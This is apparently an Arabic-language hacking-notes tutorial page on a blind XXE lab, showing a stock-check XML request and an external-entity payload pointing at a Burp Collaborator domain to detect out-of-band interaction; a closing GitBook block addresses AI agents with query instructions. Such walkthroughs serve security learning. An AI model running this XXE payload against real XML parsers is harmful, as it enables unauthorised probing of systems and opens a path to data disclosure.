> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/ar/web/xxe/blind-xxe-with-out-of-band-interaction.md).

# XXE أعمى مع تفاعل خارج النطاق

### ثغرة XXE عمياء مع تفاعل خارج النطاق

تقبل ميزة فحص المخزون ملف XML ولكن **لا تعرض** الإجابة. هذه ثغرة XXE عمياء: لا ترى مباشرةً المحتوى الذي يُعيده المُحلِّل. لاكتشاف الثغرة واستغلالها، يتم إنشاء تفاعلات خارج النطاق (OOB) — على سبيل المثال، استعلام DNS أو طلب HTTP إلى نطاق مُتحكَّم به (Burp Collaborator / OAST) — لمعرفة ما إذا كان المُحلِّل ينفذ طلبات خارجية.

{% code overflow="wrap" %}

```xml
<?xml version="1.0" encoding="UTF-8"?>
<stockCheck>
  <productId>
    test
  </productId>
  <storeId>
    1
  </storeId>
  </stockCheck>
```

{% endcode %}

إذا تم إرسال هذا الـ XML، فلن يتم الحصول على أي استجابة من الواجهة (سلوك أعمى).

<figure><img src="/files/83136b1518ea04599f2e67c9bdc78d1f35de0390" alt=""><figcaption></figcaption></figure>

#### العمل مع كيان خارجي إلى Burp Collaborator

عرّف كيانًا خارجيًا يشير إلى نطاق مُتحكَّم به (هنا: `h4m66g65x80x7bwj3ueflms990fr3hr6.oastify.com`) لإجبار المُحلِّل على إجراء استعلام HTTP/DNS — إذا وصل الاستعلام إلى خدمة OOB، فهذا يعني أن التطبيق معرض لثغرة XXE العمياء.

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY myFile SYSTEM "https://h4m66g65x80x7bwj3ueflms990fr3hr6.oastify.com">]>
<stockCheck>
  <productId>
    &myFile;
  </productId>
  <storeId>
    1
  </storeId>
  </stockCheck>
```

بعد الإرسال، نرى استلام الطلب على خدمة OOB (Burp Collaborator) مما يؤكد وجود ثغرة XXE عمياء مع تفاعل خارج النطاق.

<figure><img src="/files/b6eea46209be2b94c814974c60cfa6f71d964c84" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/ar/web/xxe/blind-xxe-with-out-of-band-interaction.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
